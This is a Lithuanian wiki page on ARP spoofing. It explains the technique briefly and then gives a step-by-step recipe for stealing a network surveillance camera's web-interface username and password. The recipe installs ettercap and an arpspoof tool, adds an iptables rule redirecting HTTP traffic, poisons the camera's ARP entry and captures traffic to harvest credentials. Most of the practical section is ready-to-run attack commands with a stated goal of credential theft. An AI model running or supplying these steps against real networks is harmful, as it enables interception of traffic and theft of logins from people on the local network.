\dev\null 05:51, 3 rugpjūčio 2017

2017-08-03T05:51:01Z

Naujas puslapis

Kompiuteriniuose tinkluose, [[ARP]] spoofing, [[ARP]] cache poisoning ar ARP poison (nuodyjimas), ARP poison routing - meistriška technika, kurią pasitelkus įsibrovėlis siunčia netikras (spoofed) ARP (Address Resolution Protocol) žinutes į lokalų tinklą. Ši technika veikia taip: įsibrovėlio [[MAC]] adresas susiejamas su [[IP]] adresu kito hosto, pvz išeities šliuzo ([[gateway]]). Visas srautas skirtas tam [[IP]] adresui keliauja pas įsibrovėlį.

ARP spoofingas leidžia įsibrovėlui nukreipti į save visą aukos srautą, tokiu atveju įsibrovėlis gali stebėti srautą, keisti srautą, užrausti jį arba pasinaudoti viena iš kitų būdingų atakų pvz.: [[Denial Of Service]], [[Man In The Middle]] arba sesijos perėmimo ([[session hijacking]]) ataka.

Ataka veiksminga tiktai tinkluose kuriuose naudojamas [[ARP]] (Address Resolution protokolas) ir apsiriboja veikimu tiktai [[Lokalus tinklas|lokalaus tinklo]] segmentuose.

= Intro =

Tikslas: gauti stebėjimo kameros esancios tinkle, web interfeiso prisijungimus (username, password) ip: 192.168.1.51
* Tinklo konfiguracija:
* subnet: 255.255.255.0
* router: 192.168.1.1

= Diegimas =

Susidedam tinklo irankius
apt-get install build-essential ettercap
git clone https://github.com/smikims/arpspoof.git
cd arpspoof
make

= Panaudojimas =
Redirektinam 80 (http) porto srauta i 1024 porta
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1024
Nustatom arpspoof
./arpspoof -i eth0 192.168.1.51
Gaudom srauta
ettercap -Tq -i eth0 -w capturas
Kai vyksta routerio atsijungimas, arba jeigu turime prisijungimus darome restart. Tuo metu jeigu kas nors jungsis i webcam'a, srautas redirectinisis i musu paketu stebejima. Gauname srauta...

[[Category:Tinklas]]
[[Category:Saugumas]]

ARP Poisoning - Versijų istorija

\dev\null 05:51, 3 rugpjūčio 2017